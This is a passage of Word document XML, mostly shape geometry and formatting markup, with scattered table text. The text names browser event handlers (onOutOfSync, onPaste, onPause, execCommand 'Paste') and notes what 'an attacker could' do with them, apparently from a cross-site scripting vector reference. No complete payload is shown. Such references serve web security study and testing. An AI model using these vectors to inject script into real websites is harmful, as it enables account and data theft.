                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 349 167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 95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11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onOutOfSync()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0" o:spid="_x0000_s1482" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:58.35pt;height:9.15pt;z-index:-17606144;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="116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">
                <v:shape id="Freeform 952" o:spid="_x0000_s1483" style="position:absolute;left:1930;top:167;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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wVUcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H+wdwhl4IzNVpmydUaYgFMQLfx7g0Jy1&#10;xeakJGkb395cDHb58f2vt9G0YiDnG8sK5rMMBHFpdcOVgtv18P4Jwgdkja1lUvAgD9vN68sac21H&#10;PtNwCZVIIexzVFCH0OVS+rImg35mO+LE/VpnMCToKqkdjinctHKRZStpsOHUUGNH+5rK+6U3Ck77&#10;XSzwODofi6H/6Ke3s3zclZq8xZ9vEIFi+Bf/uQut4GuZ5qc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ysFVHBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,349;21,349;18,349;0,328;0,325;0,188;21,167;1146,167;1167,188;1167,328;1149,349;1146,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 951" o:spid="_x0000_s1484" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:116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+CWsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGoWJSV5GiIBSkMR56fM0+&#10;k8Xs25hdNf33bkHwOMzMN8x82dtGXKnzxrGC8SgBQVw6bbhScCg2wxkIH5A1No5JwR95WC5eBnPM&#10;tLtxTtd9qESEsM9QQR1Cm0npy5os+pFriaN3dJ3FEGVXSd3hLcJtIydJMpUWDceFGlv6rKk87S9W&#10;weqH87U5736/82NuiiJN+Gt6UurttV99gAjUh2f40d5qBen7G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P4Ja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onOutOfSync()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13120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321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="946" name="Group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507"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="947" name="Freeform 949"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="507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690 507"/>
                              <a:gd name="T3" fmla="*/ 690 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 690 507"/>
                              <a:gd name="T7" fmla="*/ 690 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 689 507"/>
                              <a:gd name="T11" fmla="*/ 689 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 669 507"/>
                              <a:gd name="T15" fmla="*/ 669 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 529 507"/>
                              <a:gd name="T23" fmla="*/ 529 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 529 507"/>
                              <a:gd name="T35" fmla="*/ 529 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 669 507"/>
                              <a:gd name="T39" fmla="*/ 669 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 689 507"/>
                              <a:gd name="T43" fmla="*/ 689 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 690 507"/>
                              <a:gd name="T47" fmla="*/ 69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2"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="826" y="162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Text Box 94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07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onPaste()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7" o:spid="_x0000_s1485" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.35pt;width:41.35pt;height:9.15pt;z-index:15813120;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,507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">
                <v:shape id="Freeform 949" o:spid="_x0000_s1486" style="position:absolute;left:1930;top:507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AjqcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKXkQ3DaWa1FVMi9iDF2MoHh/Z&#10;1ySYfRuyq6b/visIPQ4z8w2zXA+mFVfqXWNZwcssAkFcWt1wpaA4bqcLEM4ja2wtk4JfcrBejZ6W&#10;mGp74wNdc1+JAGGXooLa+y6V0pU1GXQz2xEH78f2Bn2QfSV1j7cAN62Mo+hNGmw4LNTY0UdN5Tm/&#10;GAX77LNKtt87f5JxkUzOpwx1eVBq/Dxs3kF4Gvx/+NH+0gqS1zncz4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AjqcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m805,183r-784,l18,182,,162r,-4l,22,21,,805,r21,22l826,162r-17,20l805,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,690;21,690;18,689;0,669;0,665;0,529;21,507;805,507;826,529;826,669;809,689;805,690" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 948" o:spid="_x0000_s1487" type="#_x0000_t202" style="position:absolute;left:1930;top:507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y9GsMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhN201QZop2xlDFBGIzV7rDjW/Ns&#10;Q5uXrom1+++Xw8Djx/d7n022EyMN3jhWsFomIIgrpw3XCj7L42ILwgdkjZ1jUvBLHrLDw2yPqXY3&#10;Lmg8h1rEEPYpKmhC6FMpfdWQRb90PXHkLm6wGCIcaqkHvMVw28l1kmykRcOxocGeXhqq2vPVKsi/&#10;uHg1P+/fH8WlMGW5S/ht0yr1OJ/yZxCBpnAX/7tPWsHuKa6N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9y9Gs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onPaste()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13632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4188460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1111250" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="943" name="Group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1250" cy="116205"/>
                          <a:chOff x="6596" y="507"/>
                          <a:chExt cx="1750" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="944" name="Freeform 946"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6595" y="507"/>
                            <a:ext cx="1750" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8324 6596"/>
                              <a:gd name="T1" fmla="*/ T0 w 1750"/>
                              <a:gd name="T2" fmla="+- 0 690 507"/>
                              <a:gd name="T3" fmla="*/ 690 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6617 6596"/>
                              <a:gd name="T5" fmla="*/ T4 w 1750"/>
                              <a:gd name="T6" fmla="+- 0 690 507"/>
                              <a:gd name="T7" fmla="*/ 690 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6614 6596"/>
                              <a:gd name="T9" fmla="*/ T8 w 1750"/>
                              <a:gd name="T10" fmla="+- 0 689 507"/>
                              <a:gd name="T11" fmla="*/ 689 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6596 6596"/>
                              <a:gd name="T13" fmla="*/ T12 w 1750"/>
                              <a:gd name="T14" fmla="+- 0 669 507"/>
                              <a:gd name="T15" fmla="*/ 669 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6596 6596"/>
                              <a:gd name="T17" fmla="*/ T16 w 1750"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6596 6596"/>
                              <a:gd name="T21" fmla="*/ T20 w 1750"/>
                              <a:gd name="T22" fmla="+- 0 529 507"/>
                              <a:gd name="T23" fmla="*/ 529 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6617 6596"/>
                              <a:gd name="T25" fmla="*/ T24 w 1750"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8324 6596"/>
                              <a:gd name="T29" fmla="*/ T28 w 1750"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8345 6596"/>
                              <a:gd name="T33" fmla="*/ T32 w 1750"/>
                              <a:gd name="T34" fmla="+- 0 529 507"/>
                              <a:gd name="T35" fmla="*/ 529 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8345 6596"/>
                              <a:gd name="T37" fmla="*/ T36 w 1750"/>
                              <a:gd name="T38" fmla="+- 0 669 507"/>
                              <a:gd name="T39" fmla="*/ 669 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8328 6596"/>
                              <a:gd name="T41" fmla="*/ T40 w 1750"/>
                              <a:gd name="T42" fmla="+- 0 689 507"/>
                              <a:gd name="T43" fmla="*/ 689 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8324 6596"/>
                              <a:gd name="T45" fmla="*/ T44 w 1750"/>
                              <a:gd name="T46" fmla="+- 0 690 507"/>
                              <a:gd name="T47" fmla="*/ 69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50" h="183">
                                <a:moveTo>
                                  <a:pt x="1728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1728" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1749" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1749" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1728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Text Box 945"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6595" y="507"/>
                            <a:ext cx="175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1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execCommand("Paste")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4" o:spid="_x0000_s1488" style="position:absolute;left:0;text-align:left;margin-left:329.8pt;margin-top:25.35pt;width:87.5pt;height:9.15pt;z-index:15813632;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6596,507" coordsize="175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">
                <v:shape id="Freeform 946" o:spid="_x0000_s1489" style="position:absolute;left:6595;top:507;width:1750;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="175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gmGMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmCN91Vgmh0FRGs4qXUSs+P7DMJ&#10;Zt/G7DZJ/31XKPQ4zMw3zGbX20q01PjSsYbZVIEgzpwpOddw+zxOliB8QDZYOSYNP+Rhtx0ONpga&#10;1/EHtdeQiwhhn6KGIoQ6ldJnBVn0U1cTR+/uGoshyiaXpsEuwm0l50otpMWS40KBNR0Kyh7Xb6vh&#10;3p2+LotEhVun3t7b56p8Lk8Hrcejfr8GEagP/+G/9tloWCUJvM7EI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oJhjEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1728,183l21,183r-3,-1l,162r,-4l,22,21,,1728,r21,22l1749,162r-17,20l1728,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1728,690;21,690;18,689;0,669;0,665;0,529;21,507;1728,507;1749,529;1749,669;1732,689;1728,690" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 945" o:spid="_x0000_s1490" type="#_x0000_t202" style="position:absolute;left:6595;top:507;width:175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0ShM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qYfI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3RKE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1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execCommand("Paste")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(interrupt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sect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ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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paste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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function)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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="460" w:space="685"/>
            <w:col w:w="3985" w:space="1609"/>
            <w:col w:w="2281"/>
          </w:cols>
        </w:sect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160"/>
        <w:ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/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1"/>
        <w:ind w:left="420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160"/>
        <w:ind w:left="420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ind w:left="421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160"/>
        <w:ind w:left="420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ind w:left="421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161"/>
        <w:ind w:left="420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ind w:left="421" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:r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160"/>
        <w:ind w:left="421" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:ind w:left="4"/>
      </w:pPr>
      <w:r>
        <w:t>element)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="182"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>onpause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>element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active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pauses,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>including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body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="439" w:lineRule="auto"/>
        <w:ind w:left="434" w:right="3437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14144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-381000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="940" name="Group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-600"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="941" name="Freeform 943"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-601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-418 -600"/>
                              <a:gd name="T3" fmla="*/ -418 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 -418 -600"/>
                              <a:gd name="T7" fmla="*/ -418 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 -419 -600"/>
                              <a:gd name="T11" fmla="*/ -419 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 -439 -600"/>
                              <a:gd name="T15" fmla="*/ -439 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 -442 -600"/>
                              <a:gd name="T19" fmla="*/ -442 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 -579 -600"/>
                              <a:gd name="T23" fmla="*/ -579 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 -600 -600"/>
                              <a:gd name="T27" fmla="*/ -600 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 -600 -600"/>
                              <a:gd name="T31" fmla="*/ -600 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 -579 -600"/>
                              <a:gd name="T35" fmla="*/ -579 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 -439 -600"/>
                              <a:gd name="T39" fmla="*/ -439 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 -419 -600"/>
                              <a:gd name="T43" fmla="*/ -419 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 -418 -600"/>
                              <a:gd name="T47" fmla="*/ -41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1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Text Box 94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-601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onPause()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1" o:spid="_x0000_s1491" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-30pt;width:41.35pt;height:9.15pt;z-index:15814144;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-600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">
